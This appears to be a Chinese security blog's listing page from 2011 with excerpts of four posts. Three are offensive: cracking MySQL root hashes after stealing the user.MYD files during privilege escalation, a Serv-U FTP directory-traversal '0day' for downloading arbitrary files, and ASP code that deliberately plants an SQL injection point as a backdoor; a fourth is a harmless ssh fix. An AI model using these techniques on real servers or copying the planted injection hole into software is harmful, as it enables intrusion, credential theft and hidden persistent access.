2011年12月13日

MySQL Root密码另类破解

摘要: 提权时,当下载mysql的user.MYD数据库连接密码hash值无法用winhex等十六进制编辑器查看时:停止mysql服务将下载的user.MYD user.frm user.MYI替换本地文件,然后cd mysql\binmysqld-nt --skip-grant-tables重新打开一个cmdmysql -u rootselect user,password from mysql.user; 阅读全文

posted @ 2011-12-13 12:10 =_=! 阅读(237) 评论(0) 推荐(0) 编辑

Serv-U FTP Jail Break(越权遍历目录、下载任意文件)

摘要: [*]----------------------------------------------------[*]Serv-U FTP Server Jail Break 0dayDiscovered By KingcopeYear 2011[*]----------------------------------------------------[*]/*通过构造..:/来遍历服务器目录,下载任意文件影响版本:6.4,7.1,7.3,8.2,10.5*/Affected:220 Serv-U FTP Server v7.3 ready...220 Serv-U FTP Server v7 阅读全文

posted @ 2011-12-13 12:08 =_=! 阅读(566) 评论(0) 推荐(0) 编辑

ssh登入不了,被拒绝的处理方法。

摘要: 1、service ssh start 开启ssh服务2、从实体机telnet 虚拟机的22端口,发现已打开,但是ssh还是上不去。3、sshd-generate之后生成密钥,再ssh发现顺利ssh 阅读全文

posted @ 2011-12-13 12:06 =_=! 阅读(2252) 评论(0) 推荐(0) 编辑

构造注入点后门代码

摘要: /**************************Mssql***********************/<!–#include file="conn.asp"–><%hid=request.QueryString("id")sql="select * from admin where id="&hidset rs=conn.execute (sql)%>/**************************Access***********************/<%db="a 阅读全文

posted @ 2011-12-13 12:04 =_=! 阅读(249) 评论(0) 推荐(0) 编辑

导航